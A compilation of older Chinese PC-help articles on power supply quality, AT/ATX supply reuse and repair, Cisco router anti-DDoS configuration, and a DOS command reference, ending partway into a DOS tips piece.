深入辨识机箱电源的优劣(一)

《一键清理系统垃圾》

深入辨识机箱电源的优劣(一)

    机箱电源是一台电脑的动力源泉，它的好坏直接决定着你的电脑是否能够正常工作。作为一个误区，许多装机者在装机时往往只重视CPU、显卡等关键部件，而对于提供能源的机箱电源却很少重视。在这个问题上，刚入门的用户更易忽略。许多未接触过电脑硬件的读者们，往往对这个“铁盒子”中焊接做工、元件用料的了解甚少。为了帮助大家“擦亮”眼睛认识机箱电源，笔者特撰此文，希望能够对那些希望了解机箱电源的读者们有所帮助。

    一台机箱电源主要由EMI（抗干扰、滤波）电路、二次高频滤波电路、高压整流滤波电路、开关电路（包括基准电压、取样、比较等辅助控制电路）、低压整流滤波电路、待机电路（ATX电源）和保护电路组成。下面，笔者主要通过电源关键电路的元件用料来帮助大家判断电源的优劣。

    EMI电路

    在机箱电源的电源插孔上，连接有一个EMI滤波电路，它是由电容和线圈所组成的。EMI滤波电路是电源中的第一道滤波电路，其作用是滤除电网中的高频杂波和同相干扰信号，以及避免电源中产生的电磁干扰泄漏到外面。

    没有EMI电路的电源所泄漏的电磁干扰会影响到显示器和声卡、Modem、电视卡等设备的正常使用，而且还会对人体造成伤害。

图1 做工良好的电源的EMI电路

    图1所示的是一款做工良好的电源的EMI电路。

图2 劣质电源的EMI电路

    图2所示的则是一款偷工减料，省略了EMI电路的劣质电源。由于没有EMI电路，这款电源泄漏的电磁干扰将会对其他板卡设备的正常工作造成很大的影响。


双电源串联供电使用法

《一键清理系统垃圾》

双电源串联供电使用法

    旧电脑淘汰下来的设备，扔掉未免可惜，有些设备仍可以再利用。本文就来教大家如何将旧型的AT电源供应器搭配在机箱上的ATX电源供应器使用。

    准备的工具及材料
    ①电源供应器1个:这次的主题是AT电源供应器的再利用，当然要准备一颗AT的电源供应器，才能进行改装。
    ②电源线1条:除了要准备一般插座用的电源线外，要再准备一条显示器连接至电源供应器的电源线。（1条约3元）
    ③外框架3组:利用商场购买的软驱外框架，来改做扩充设备的安装架。（3组共约30元）
    ④固定铁架4根:用来固定软驱外框架，这里是将固定硬盘用的铁架拿来变更使用。（4根约20元）
    ⑤固定外框架与电源供应器用的吸盘，可以到商场购买浴室用的吸盘式壁钩，取下上面的吸盘来使用。（8颗共约10元）
    ⑥胶枪1支:用来黏着外框架与底座吸盘。
    ⑦工具包:至少要含美工刀、螺丝起子、锯子等工具，以供稍后改装时使用。
    ⑧ATX机箱1部:加上400W电源供应器，应有可接显示器的电源线孔。

    ※注意:在动手做之前，建议大家先将目前电脑内的设备作一次总的检查。这次课程的目的是将机箱内一些会产生高热的设备，如SCSI设备或是一些较不常用的设备，通过第二个电源改成外接方式，以节省机箱内的空间，让机箱内散热更好。

    一、检查旧电源供应器
    使用以前旧电脑的电源，最好先拿一条电源线连接至插座，然后打开开关检查供电是否正常，以免连接时无法使用。

    二、制作一个设备放置架
    既然要改成外接的方式，就要有架子来放这些设备。先到电子商场购买3.5英寸软驱转成5.25英寸使用的软驱外框架，这里在示范时使用三组。

    接着将其中一个外框架的边框锯除，在示范课程中有一台SCSI CD-RW准备移出来外接，由于CD-RW比较大，所以必须使用小锯子将小框架的边框锯除，才能将CD-RW放上去。

    再将软驱外框架里头的3.5英寸锁孔一并锯除，这样才能将CD-RW平稳地放在上面。

    建议:在分接设备时若电脑内有SCSI与IDE装置，可以将它分开来安装，最好将IDE装置保留在机箱中，而将内接的SCSI设备移至第二组电源来使用，这样机箱内的散热条件就得到了改善，SCSI排线也比较容易从电脑中的SCSI卡上连接。

    接着改造购买来的硬盘铁架用作外框架的组合支架，使用软驱外框架附的尖头螺丝将它锁上，确实锁上四根才能牢靠地固定。
因为只需要底板来做CD-RW的支架，而为了让底板有所支撑，所以使用自攻螺丝锁在铁架上当作支撑，这样就可将CD-RW放上去固定。

    三、固定外框架的装置
    完成外框架的组装后，再拿4个吸盘用美工刀将吸盘的头切除，然后用胶枪将它们分别黏在底盘的四个角落，这样等一下再放到机箱上面，就可以固定稳当，而且具有防震的效果。

    接着将内接的SCSI设备从电脑中移出，这里示范的是CD-RW刻录机与ZIP驱动器各一部，将它们分别锁在刚刚完成改装的外框架上。若读者不是使用示范教学中的设备，同样也可以使用这种方式来安装。

    完成安装后放在机箱前面上方固定，这样就变成一组外接设备使用的放置架。依此类推，还可以根据需要增加新的外接设备（如果愿意，把硬盘放在机箱外面也可以），接下来继续进行下个步骤的改装。

    四、电源供应器的调整
    将旧的AT电源取出，然后将剩下的4个吸盘上的接头用美工刀切除，再用胶枪将吸盘分别黏在四个角落固定好。黏好后再将AT电源供应器放在机箱上，这样就可以利用底部的吸盘来固定。接着将AT电源上供主板使用的电源线收起，因为现在的主板已经不使用AT的电源插头，所以将它用束线或是橡皮筋绑好固定在电源供应器边。

    将准备好的电源线一头与机箱ATX电源供应器上供显示器接电用的连接孔连接，另一头接在刚刚固定好的AT电源供应器上，这样就可以通过ATX电源供应器来供电，完成两个电源的串联。

    五、完成最后的组合
    将先前安装好SCSI设备的外框架放在机箱上面，按图中所示方式摆放，再将电源线接到这些设备上。

    接下来必须将SCSI排线穿过机箱才能连至这些设备上，这里必须牺牲一组接口卡档片。将挡片取下后，就可以让接在SCSI卡上的排线从这里穿过来连接在外框架的刻录与ZIP驱动器上。

    最后将AT电源供应器的开关锁好固定在外框架上，就可以很方便地按开关供电。

    注意:从这里大家可以知道，通过这样的方式，我们就能够利用原本被淘汰的AT电源让更多的设备有足够的电能使用。不过要记得，在电脑开机的情况下，要启动连接在另外一个电源供应器上的SCSI设备，仍要先将主电脑关机后再重开电源供应器，才不会导致电脑的操作系统死机。

    六、结束
    最后将电源供应器打开，进入Win98操作系统，检查一下是否可以看到接在机箱外边的SCSI设备，这样就完成所有的改装。这种改装方法对于拥有多种设备的电脑用户，特别是那些因为机箱空间不足而必须舍弃一些设备的人来说，是相当有用的，而且改装很方便，花费也很少，更可以改善机箱内部空间拥挤而产生散热不良的问题。若你也有这些困扰，那就花点时间来体会一下DIY的乐趣吧！


一打开电源就自动开机

《一键清理系统垃圾》

一打开电源就自动开机

    （江苏 许向前）答：一打开电源电脑就自动开机，通常情况下有两种可能：

    1、主板或电源质量不佳。ATX主板的启动需要检测一个电容的电平信号，如果电源或主板质量不佳 ，当主机接通电源时，会产生一个瞬间的冲击电流，就可能使电源误认为是开机信号，从而导致一打开电源就自动开机。

    2、主板BIOS设置不正确。在主板BIOS中有一个“Power Management Setup（电源管理设置）”设置项，在其中可以选择意外断电后重新来电时计算机的状态，可分为自动开机、保持关机状态、保持断电前的状态，把自动开机设为Off（保持关机）即可。


自救AT电源两例

《一键清理系统垃圾》

返回总目录 上一页 目录页

自救AT电源两例

    朋友的AT电源坏了，拆下来给我修理。其故障现象是通电后无电压输出，电源内发出吱吱声。这是电源过载或无负载的典型特征。
    打开电源外壳，发现有一个IN4001二极管表面已经烧黑，而且电路板也被烧黑了。于是用同型号的二极管将它换下，用万用表一量，果然被击穿了。接上电源，可风扇仍不转，吱吱声依然。用万用表量，＋12V只有＋0.2V，＋5V只有0.1V。又将风扇拆下，拿到别的电源上试用，又是正常的。这说明电路中还有别的元件损坏，从而引起电源启动自保护。关电源，用手摸初级和次级开关管的散热片。发现初级中二个开关管中的一个为常温，而另一个则很烫。（记住关电源后，不可同时摸这两个初级开关管的散热片，因为上面有很大的电压差。我可是被电了一下！）该温差说明，处于常温的那一个开关管没有工作，焊下来一量，果然被击穿。找同型号的LM5007换上，一切正常。
    另一个电源是一个工控机上的AT电源，有300W，电源上有4大3小和一个2芯＋12V的特殊插头。这种AT电源市面上很难找。该电源坏得厉害，没有吱吱声，而且上一个保险管就烧一个保险管。根据保险丝管不断熔断的现象，故障原因可能有3个：1.整流桥被击穿；2.大电解电容器被击穿；3.初级开关管被击穿。这个电源的整流桥是一个四脚的集成块，拆下一量，正常。拆下大电解电容器检查，正常。注意焊回电解电容器时，要注意正负极。除此之外，就只剩下开关管了。这个电源的初级只有一个大功率的开关管。拆下一量，果然被击穿。找同型号的SSH6N80（714）换上，问题解决。


电源故障

《一键清理系统垃圾》

返回总目录

电源故障

◎AT电源在ATX环境下的使用
◎变废为宝——摩好你的劣质电源
◎不花钱的扫描仪电源
◎电源插座惹的祸
◎电源故障一例
◎电源问题引起的计算机运行速度变慢
◎电源质量莫小瞧
◎改造不当，当烧电源
◎解决接通电源后自动开机问题
◎开关电源维修一例
◎劣质电源祸害无穷
◎让AT电源也自动关机
◎山特8222型UPS电源检修
◎深入辨识机箱电源的优劣(二)
◎深入辨识机箱电源的优劣(三)
◎深入辨识机箱电源的优劣(四)
◎深入辨识机箱电源的优劣(一)
◎双电源串联供电使用法
◎一打开电源就自动开机
◎自救AT电源两例

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


Cisco路由器上如何防止DDoS

《一键清理系统垃圾》

返回总目录 目录页 下一页

Cisco路由器上如何防止DDoS

    Cisco路由器上防止分布式拒绝服务（DDoS）攻击的一些建议

    1、使用 ip verfy unicast reverse-path 网络接口命令
    这个功能检查每一个经过路由器的数据包。在路由器的CEF（Cisco Express Forwarding）表该数据包所到达网络接口的所有路由项中，如果没有该数据包源IP地址的路由，路由器将丢弃该数据包。例如，路由器接收到一个源IP地址为1.2.3.4的数据包，如果CEF路由表中没有为IP地址1.2.3.4提供任何路由（即反向数据包传输时所需的路由），则路由器会丢弃它。

    单一地址反向传输路径转发（Unicast Reverse Path Forwarding）在ISP（局端）实现阻止SMURF攻击和其它基于IP地址伪装的攻击。这能够保护网络和客户免受来自互联网其它地方的侵扰。使用Unicast RPF需要打开路由器的"CEF swithing"或"CEF distributed switching"选项。不需要将输入接口配置为CEF交换（switching）。只要该路由器打开了CEF功能，所有独立的网络接口都可以配置为其它交换（switching）模式。RPF（反向传输路径转发）属于在一个网络接口或子接口上激活的输入端功能，处理路由器接收的数据包。
在路由器上打开CEF功能是非常重要的，因为RPF必须依靠CEF。Unicast RPF包含在支持CEF的Cisco IOS 12.0及以上版本中，但不支持Cisco IOS 11.2或11.3版本。

    2、使用访问控制列表（ACL）过滤RFC 1918中列出的所有地址

    参考以下例子：

    interface xy
    ip access-group 101 in
    access-list 101 deny ip 10.0.0.0 0.255.255.255 any
    access-list 101 deny ip 192.168.0.0 0.0.255.255 any
    access-list 101 deny ip 172.16.0.0 0.15.255.255 any
    access-list 101 permit ip any any

    3、参照RFC 2267，使用访问控制列表（ACL）过滤进出报文

    参考以下例子：

    {ISP中心} -- ISP端边界路由器 -- 客户端边界路由器 -- {客户端网络}

    ISP端边界路由器应该只接受源地址属于客户端网络的通信，而客户端网络则应该只接受源地址未被客户端网络过滤的通信。以下是ISP端边界路由器的访问控制列表（ACL）例子：

    access-list 190 permit ip {客户端网络} {客户端网络掩码} any
    access-list 190 deny ip any any [log]

    interface {内部网络接口} {网络接口号}
    ip access-group 190 in

    以下是客户端边界路由器的ACL例子：

    access-list 187 deny ip {客户端网络} {客户端网络掩码} any
    access-list 187 permit ip any any

    access-list 188 permit ip {客户端网络} {客户端网络掩码} any
    access-list 188 deny ip any any

    interface {外部网络接口} {网络接口号}
    ip access-group 187 in
    ip access-group 188 out

    如果打开了CEF功能，通过使用单一地址反向路径转发（Unicast RPF），能够充分地缩短访问控制列表（ACL）的长度以提高路由器性能。为了支持Unicast RPF，只需在路由器完全打开CEF；打开这个功能的网络接口并不需要是CEF交换接口。

    4、使用CAR（Control Access Rate）限制ICMP数据包流量速率

    参考以下例子：

    interface xy
    rate-limit output access-group 2020 3000000 512000 786000 conform-action
    transmit exceed-action drop

    access-list 2020 permit icmp any any echo-reply

    请参阅IOS Essential Features 获取更详细资料。

    5、设置SYN数据包流量速率

    interface {int}
    rate-limit output access-group 153 45000000 100000 100000 conform-action
    transmit exceed-action drop
    rate-limit output access-group 152 1000000 100000 100000 conform-action
    transmit exceed-action drop

    access-list 152 permit tcp any host eq www
    access-list 153 permit tcp any host eq www established

    在实现应用中需要进行必要的修改，替换：

    45000000为最大连接带宽
    1000000为SYN flood流量速率的30%到50%之间的数值。
    burst normal（正常突变）和 burst max（最大突变）两个速率为正确的数值。

    注意，如果突变速率设置超过30%，可能会丢失许多合法的SYN数据包。使用"show interfaces rate-limit"命令查看该网络接口的正常和过度速率，能够帮助确定合适的突变速率。这个SYN速率限制数值设置标准是保证正常通信的基础上尽可能地小。

    警告：一般推荐在网络正常工作时测量SYN数据包流量速率，以此基准数值加以调整。必须在进行测量时确保网络的正常工作以避免出现较大误差。

    另外，建议考虑在可能成为SYN攻击的主机上安装IP Filter等IP过滤工具包。

    6、搜集证据并联系网络安全部门或机构

    如果可能，捕获攻击数据包用于分析。建议使用SUN工作站或Linux等高速计算机捕获数据包。常用的数据包捕获工具包括TCPDump和snoop等。基本语法为：

    tcpdump -i interface -s 1500 -w capture_file

    snoop -d interface -o capture_file -s 1500

    本例中假定MTU大小为1500。如果MTU大于1500，则需要修改相应参数。将这些捕获的数据包和日志作为证据提供给有关网络安全部门或机构。

返回


DOS的常用命令（二）

《一键清理系统垃圾》

DOS的常用命令（二）

   磁盘操作类命令

（一）FORMAT——磁盘格式化命令

1．功能：对磁盘进行格式化，划分磁道和扇区；同时检查出整个磁盘上有无带缺陷的磁道，对坏道加注标记；建立目录区和文件分配表，使磁盘作好接收DOS的准备。

2．类型：外部命令

3．格式：FORMAT〈盘符：〉[/S][/4][/Q]

4．使用说明：

（1）命令后的盘符不可缺省，若对硬盘进行格式化，则会如下列提示：WARNING:ALL DATA ON NON ——REMOVABLE DISK

DRIVE C:WILL BE LOST ！

Proceed with Format (Y/N)？

（警告：所有数据在C盘上，将会丢失，确实要继续格式化吗？）

（2）若是对软盘进行格式化，则会如下提示：Insert mew diskette for drive A;
and press ENTER when ready…

（在A驱中插入新盘，准备好后按回车键）。

（3）选用[/S]参数，将把DOS系统文件IO.SYS 、MSDOS.SYS及COMMAND.COM复制到磁盘上，使该磁盘可以做为DOS启动盘。若不选用/S参数，则格式化后的磙盘只能读写信息，而不能做为启动盘；

（4）选用[/4]参数，在1.2MB的高密度软驱中格式化360KB的低密度盘；

（5）选用[/Q]参数，快速格式化，这个参数并不会重新划分磁盘的磁道貌岸然和扇区，只能将磁盘根目录、文件分配表以及引导扇区清成空白，因此，格式化的速度较快。

（6）选用[/U]参数，表示无条件格式化，即破坏原来磁盘上所有数据。不加/U，则为安全格式化，这时先建立一个镜象文件保存原来的FAT表和根目录，必要时可用UNFORRMAT恢复原来的数据。

（二）UNFORMAT恢复格式化命令

1．功能：对进行过格式化误操作丢失数据的磁盘进行恢复。

2．类型：外部命令

3．格式：UNFORMAT〈盘符〉[/L][/U][/P][/TEST]

4．使用说明：用于将被“非破坏性”格式化的磁盘恢复。根目录下被删除的文件或子目录及磁盘的系统扇区（包括FAT、根目录、BOOT扇区及硬盘分区表）受损时，也可以用UNFORMAT来抢救。

（1）选用/L参数列出找到的子目录名称、文件名称、大孝日期等信息，但不会真的做FORMAT工作。

（2）选用/P参数将显示于屏幕的报告（包含/L参数所产生的信息）同时也送到打印机。运行时屏幕会显示：“Print out will be sent to LPT1”

（3）选用/TEST参数只做模拟试验（TEST）不做真正的写入动作。使用此参数屏幕会显示：“Simulation only”

（4）选用/U参数不使用MIRROR映像文件的数据，直接根据磁盘现状进行UNFORMAT。

（5）选用/PSRTN；修复硬盘分区表。

若在盘符之后加上/P、/L、/TEST之一，都相当于使用了/U参数，UNFORMAT会“假设”此时磁盘没有MIRROR映像文件。

注意：UNFORMAT对于刚FORMAT的磁盘，可以完全恢复，但FORMAT后若做了其它数据的写入，则UNFORMAT就不能完整的救回数据了。UNFORMAT并非是万能的，由于使用UNFORMAT会重建FAT与根目录，所以它也具有较高的危险性，操作不当可能会扩大损失，如果仅误删了几个文件或子目录，只需要利用UNDELETE就够了。

（三） CHKDSK——检查磁盘当前状态命令

1．功能：显示磁盘状态、内存状态和指定路径下指定文件的不连续数目。

2．类型：外部命令

3．格式：CHKDSK [盘符：][路径][文件名][/F][/V]

4．使用说明：

（1）选用[文件名]参数，则显示该文件占用磁盘的情况；

（2）选[/F]参数，纠正在指定磁盘上发现的逻辑错误；

（3）选用[/V]参数，显示盘上的所有文件和路径。

（四）DISKCOPY——整盘复制命令

1．功能：复制格式和内容完全相同的软盘。

2．类型：外部命令

3．格式：DISKCOPY[盘符1：][盘符2：]

4．使用说明：

（1）如果目标软盘没有格式化，则复制时系统自动选进行格式化。

（2）如果目标软盘上原有文件，则复制后将全部丢失。

（3）如果是单驱动器复制，系统会提示适时更换源盘和目标盘，请操作时注意分清源盘和目标盘。

（五）LABEL——建立磁盘卷标命令

1．功能：建立、更改、删除磁盘卷标。

2．类型：外部命令

3．格式：LABEL[盘符：][卷标名]

4．使用说明：

（1）卷标名为要建立的卷标名，若缺省此参数，则系统提示键入卷标名或询问是否删除原有的卷标名；

（2）卷标名由1至11个字符组成。

（六）VOL——显示磁盘卷标命令

1．功能：查看磁盘卷标号。

2．类型：内部命令

3．格式：VOL[盘符：]

4．使用说明：省略盘符，显示当前驱动器卷标。

（七）SCANDISK——检测、修复磁盘命令

1．功能：检测磁盘的FAT表、目录结构、文件系统等是否有问题，并可将检测出的问题加以修复。

2．类型：外部命令

3．格式：SCANDISK[盘符1：]{[盘符2：]…}[/ALL]

4．使用说明：

（1）CCANDISK适用于硬盘和软盘，可以一次指定多个磁盘或选用[/ALL]参数指定所有的磁盘；

（2）可自动检测出磁盘中所发生的交叉连接、丢失簇和目录结构等逻辑上的错误，并加以修复。

（八）DEFRAG——重整磁盘命令

1．。功能：整理磁盘，消除磁盘碎块。

2．类型：外部命令

3．格式：DEFRAG[盘符：][/F]

4．使用说明：选用/F参数，将文件中存在盘上的碎片消除，并调整磁盘文件的安排，确保文件之间毫无空隙。从而加快读盘速度和节省磁盘空间。

（九）SYS——系统复制命令

1．功能：将当前驱动器上的DOS系统文件IO.SYS,MSDOS.SYS和COMMAND.COM 传送到指定的驱动器上。

2．类型：外部命令

3．格式：SYS[盘符：]

*使用说明：如果磁盘剩余空间不足以存放系统文件，则提示：No roomfor on destination disk.


DOS的常用命令（三）

《一键清理系统垃圾》

DOS的常用命令（三）

文件操作类命令

（一） COPY文件复制命令

1．功能：拷贝一个或多个文件到指定盘上。

2．类型：内部命令

3．格式：COPY [源盘][路径]〈源文件名〉[目标盘][路径][目标文件名]

4．使用说明：

（1）COPY是文件对文件的方式复制数据，复制前目标盘必须已经格式化；

（2）复制过程中，目标盘上相同文件名称的旧文件会被源文件取代；

（3）复制文件时，必须先确定目标般有足够的空间，否则会出现；insufficient的错误信息，提示磁盘空间不够；

（4）文件名中允许使用通配符“*”“？”，可同时复制多个文件；

（5）COPY命令中源文件名必须指出，不可以省略。

（6）复制时，目标文件名可以与源文件名相同，称作“同名拷贝”此时目标文件名可以省略；

（7）复制时，目标文件名也可以与源文件名不相同，称作“异名拷贝”，此时，目标文件名不能省略；

（8）复制时，还可以将几个文件合并为一个文件，称为“合并拷贝”，格式如下：
   COPY [/A | /B] 〈源文件名1〉 [/A | /B] +〈源文件名2〉 [/A | /B] [+ ...] [目标盘][路径]〈目标文件名〉[/A | /B] [/V] [/Y | /-Y]

  /A表示文件为ASCII文件，/B表示文件为二进制文件，/V校检生成的目标文件，/Y覆盖已经存在的文件。

（9）利用COPY命令，还可以从键盘上输入数据建立文件，格式如下：COPY CON [盘符：][路径]〈文件名〉；

（10）注意：COPY命令的使用格式，源文件名与目标文件名之间必须有空格！

（二）XCOPY——目录复制命令

1．功能：复制指定的目录和目录下的所有文件连同目录结构。

2．类型：外部命令

3．格式：XCOPY [源盘：]〈源路径名〉[目标盘符：][目标路径名][/S][/V][/E]

4．使用说明：

（1）XCOPY是COPY的扩展，可以把指定的目录连文件和目录结构一并拷贝，但不能拷贝隐藏文件和系统文件；

（2）使用时源盘符、源目标路径名、源文件名至少指定一个；

（3）选用/S时对源目录下及其子目录下的所有文件进行COPY。除非指定/E参数，否则/S不会拷贝空目录，若不指定/S参数，则XCOPY只拷贝源目录本身的文件，而不涉及其下的子目录；

（4）选用/V参数时，对的拷贝的扇区都进行较验，但速度会降低。

（三）TYPE——显示文件内容命令

1．功能：显示ASCII码文件的内容。

2．类型：内部命令。

3．格式：TYPE[盘符：][路径]〈文件名〉

4．使用说明：

（1）显示由ASCII码组成的文本文件，对。EXE.COM等为扩展名的文件，其显示的内容是无法阅读的，没有实际意义2；

（2）该命令一次只可以显示一个文件的内容，不能使用通配符；

（3）如果文件有扩展名，则必须将扩展名写上；

（4）当文件较长，一屏显示不下时，可以按以下格式显示；TYPE[盘符：][路径]〈文件名〉|MORE，MORE为分屏显示命令（外部命令），使用些参数后当满屏时会暂停，按任意键会继续显示。

（5）若需将文件内容打印出来，可用如下格式：

TYPE[盘符：][路径]〈文件名〉，＞PRN

此时，打印机应处于联机状态。

（四） REN——文件改名命令

1．功能：更改文件名称

2．类型：内部命令

3．格式：REN[盘符：][路径]〈旧文件名〉〈新文件名〉

4．使用说明：

（1）新文件名前不可以加上盘符和路径，因为该命令只能对同一盘上的文件更换文件名；

（2）允许使用通配符更改一组文件名或扩展名。

（五）FC——文件比较命令

1．功能：比较文件的异同，并列出差异处。

2．类型：外部命令

3．格式：FC[盘符：][路径名]〈文件名〉[盘符：][路径名][文件名][/A][/B][/C][/N]

4．使用说明：

（1）选用/A参数，为ASCII码比较模式；

（2）选用/B参数，为二进制比较模式；

（3）选用/C参数，将大小写字符看成是相同的字符。

（4）选用/N参数，在ASCII码比较方式下，显示相异处的行号。

（六）ATTRIB——修改文件属性命令

1．功能：修改指定文件的属性。（文件属性参见2.5.4（二）文件属性一节）

2．类型：外部命令。

3．格式：ATTRIB[文件名][+R][-R][+A][-A][+H][-H][+S][-S][/S]

4．使用说明：

（1）选用+R参数，将指定文件设为只读属性，使得该文件只能读取，无法写入数据或删除；选用-R参数，去除只读属性；

（2）选用+A参数，将文件设置为档案属性；选用-A参数，去除档案属性；

（3）选用+H参数，将文件调协为隐含属性；选用-H参数，去隐含属性；

（4）选用+S参数，将文件设置为系统属性；选用-S参数，去除系统属性；

（5）选用/S参数，对当前目录下的所有子目录及作设置。

（七） DEL——删除文件命令

1．功能：删除指定的文件。

2．类型：内部命令

3．格式：DEL[盘符：][路径]〈文件名〉[/P]

4．使用说明：

（1）选用/P参数，系统在删除前询问是否真要删除该文件，若不使用这个参数，则自动删除；

（2）该命令不能删除属性为隐含或只读的文件；

（3）在文件名称中可以使用通配符；

（4）若要删除磁盘上的所有文件（DEL*·*或DEL·），则会提示：(Arey ou sure？）（你确定吗？）若回答Y，则进行删除，回答N，则取消此次删除作业。

（八） UNDELETE——恢复删除命令

1．功能：恢复被误删除命令

2．类型：外部命令。

3．格式：UNDELETE[盘符：][路径名]〈文件名〉[/DOS]/LIST][/ALL]

4．使用说明：使用UNDELETE可以使用“*”和“？”通配符。

（1）选用/DOS参数根据目录里残留的记录来恢复文件。由于文件被删除时，目录所记载斩文件名第一个字符会被改为E5，DOS即依据文件开头的E5和其后续的字符来找到欲恢复的文件，所以，UNDELETE会要求用户输入一个字符，以便将文件名字补齐。但此字符不必和原来的一样，只需符合DOS的文件名规则即可。

（2）选用/LIST只“列出”符合指定条件的文件而不做恢复，所以对磁盘内容完全不会有影响。

（3）选用/ALL自动将可完全恢复的文件完全恢复，而不一一地询问用户，使用此参数时，若UNDELTE利用目录里残留的记录来将文件恢复，则会自动选一个字符将文件名补齐，并且使其不与现存文件名相同，选用字符的优选顺序为：#%——0000123456789A~Z。

UNDELETE还具有建立文件的防护措施的功能，请读者在使用些功能时查阅有关DOS手册。

七、其它命令

（一）CLS——清屏幕命令

1功能：清除屏幕上的所有显示，光标置于屏幕左上角。

2类型：内部命令

3格式：CLS

（二） VER查看系统版本号命令

1功能：显示当前系统版本号

2类型：内部命令

3格式：VER

（三） DATA日期设置命令

1功能：设置或显示系统日期。

2类型：内部命令

3格式：DATE[mm-dd-yy]

4使用说明：

（1）省略[mm-dd-yy]显示系统日期并提示输入新的日期，不修改则可直接按回车键，[mm-dd-yy]为“月月—日日—年年”格式；

（2）当机器开始启动时，有自动处理文件（AUTOEXEC.BAT）被执行，则系统不提示输入系统日期。否则，提示输入新日期和时间。

（四） TIME系统时钟设置命令

1功能：设置或显示系统时期。

2类型：内部命令

3格式：TIME[hh：mm：ss：xx]

4使用说明：

（1）省略[hh：mm：ss：xx]，显示系统时间并提示输入新的时间，不修改则可直接按回车键，[hh：mm：ss：xx]为“小时：分钟：秒：百分之几秒”格式；

（2）当机器开始启动时，有自动处理文件（AUTOEXEC.BAT）被执行，则系统不提示输入系统日期。否则，提示输入新日期和时间。

（五）MEM查看当前内存状况命令

1功能：显示当前内存使用的情况

2类型：外部命令

3格式：MEM[/C][/F][/M][/P]

4使用说明：

（1）选用/C参数列出装入常规内存和CMB的各文件的长度，同时也显示内存空间的使用状况和最大的可用空间；

（2）选用/F参数分别列出当前常规内存剩余的字节大小和UMB可用的区域及大小；

（3）选用/M参数显示该模块使用内存地地址、大小及模块性质；

（4）选用/P参数指定当输出超过一屏时，暂停供用户查看。

（六） MSD显示系统信息命令

1功能：显示系统的硬件和操作系统的状况。

2类型：外部命令

3格式：MSD[/I][/B][/S]

4使用说明：

（1）选用/I参数时，不检测硬件；

（2）选用/B参数时，以黑白方式启动MSD；

（3）选用/S参数时，显示出简明的系统报告。


DOS的常用命令（一）

《一键清理系统垃圾》

DOS的常用命令（一）

目录操作命令

（一）MD——建立子目录

1．功能：创建新的子目录

2．类型：内部命令

3．格式：MD[盘符：][路径名]〈子目录名〉

4．使用说明：

（1）“盘符”：指定要建立子目录的磁盘驱动器字母，若省略，则为当前驱动器；

（2）“路径名”：要建立的子目录的上级目录名，若缺省则建在当前目录下。

例：（1）在C盘的根目录下创建名为FOX的子目录；（2）在FOX子目录下再创建USER子目录。

C：\＞MD FOX （在当前驱动器C盘下创建子目录FOX）

C：\＞MD FOX \USER （在FOX 子目录下再创建USER子目录）

（二）CD——改变当前目录

1．功能：显示当前目录

2．类型：内部命令

3．格式：CD[盘符：][路径名][子目录名]

4．使用说明：

（1）如果省略路径和子目录名则显示当前目录；

（2）如采用“CD\”格式，则退回到根目录；

（3）如采用“CD..”格式则退回到上一级目录。

例：（1）进入到USER子目录；（2）从USER子目录退回到子目录；（3）返回到根目录。

C:\＞CD FOX \USER（进入FOX子目录下的USER子目录）

C:\FOX、USER＞CD..（退回上一级根目录）

C：\FOX＞CD\（返回到根目录）

C：\＞

（三）RD——删除子目录命令

1．功能：从指定的磁盘删除子目录。

2．类型：内部命令

3．格式：RD[盘符：][路径名][子目录名]

4．使用说明：

（1）子目录在删除前必须是空的，也就是说需要先进入该子目录，使用DEL（删除文件的命令）将其子目录下的文件删空，然后再退回到上一级目录，用RD命令删除该了目录本身；

（2）不能删除根目录和当前目录。

例：要求把C盘FOX子目录下的USER子目录删除，操作如下：

第一步：先将USER子目录下的文件删空；

C\＞DEL C：\FOX\USER\*.*

第二步，删除USER子目录。

C\＞RD C：\FOX\USER

（四）DIR——显示磁盘目录命令

1．功能：显示磁盘目录的内容。

2．类型：内部命令

3．格式：DIR [盘符][路径][/P][/W]

4． 使用说明：/P的使用；当欲查看的目录太多，无法在一屏显示完屏幕会一直往上卷，不容易看清，加上/P参数后，屏幕上会分面一次显示23行的文件信息，然后暂停，并提示；Press any key to continue

/W的使用：加上/W只显示文件名，至于文件大小及建立的日期和时间则都省略。加上参数后，每行可以显示五个文件名。

（五）PATH——路径设置命令

1．功能：设备可执行文件的搜索路径，只对文件有效。

2．类型：内部命令

3．格式：PATH[盘符1]目录[路径名1]{[；盘符2：]，〈目录路径名2〉…}

4．使用说明：

（1）当运行一个可执行文件时，DOS会先在当前目录中搜索该文件，若找到则运行之；若找不到该文件，则根据PATH命令所设置的路径，顺序逐条地到目录中搜索该文件；

（2）PATH命令中的路径，若有两条以上，各路径之间以一个分号“；”隔开；

（3）PATH命令有三种使用方法：

PATH[盘符1：][路径1][盘符2：][路径2]…（设定可执行文件的搜索路径）

PATH;（取消所有路径）

PATH （显示目前所设的路径）

（六）TREE——显示磁盘目录结构命令

1．功能：显示指定驱动器上所有目录路径和这些目录下的所有文件名。

2．类型：外部命令

3．格式：TREE[盘符：][/F][>PRN]

4．使用说明：

（1）使用/F参数时显示所有目录及目录下的所有文件，省略时，只显示目录，不显示目录下的文件；

（2）选用>PRN参数时，则把所列目录及目录中的文件名打印输出。

（七）DELTREE——删除整个目录命令

1．功能：将整个目录及其下属子目录和文件删除。

2．类型：外部命令

3．格式：DELTREE[盘符：]〈路径名〉

4．使用说明：该命令可以一步就将目录及其下的所有文件、子目录、更下层的子目录一并删除，而且不管文件的属性为隐藏、系统或只读，只要该文件位于删除的目录之下，DELTREE都一视同仁，照删不误。使用时务必小心！！！


DOS命令八大经典案例

《一键清理系统垃圾》

DOS命令八大经典案例

        DOS已逐渐远去，我们每天都习惯地使用着Windows 98/Me/2000/XP，可是你了解Windows中的DOS吗?其实在有些时候DOS还是比Windows要方便快捷得多，毕竟这个是操作系统的经典之作。下面就笔者在使用DOS过程中摸索的技巧总结成八大案例来说明一下，希望多多少少能对读者在使用电脑的过程中有点启发和帮助。
    案例一、“FC”—文件对比

    众所周知，在安装软件时，一般会在注册表中或多或少留下点什么，时间一长就会有大量的垃圾留在里面，让我们的系统逐渐变慢直至崩溃。诚然现在有很多好用的工具可以帮我们解决这个难题，可是如果我们想知道它们究竟在注册表中留下了什么，而手头又没有合适的工具，难道就束手无策了吗﹖等等，我们请出DOS下最方便的比较工具——“FC”

    格式：FC [path]＜filename＞[path]＜filename＞＜/b＞

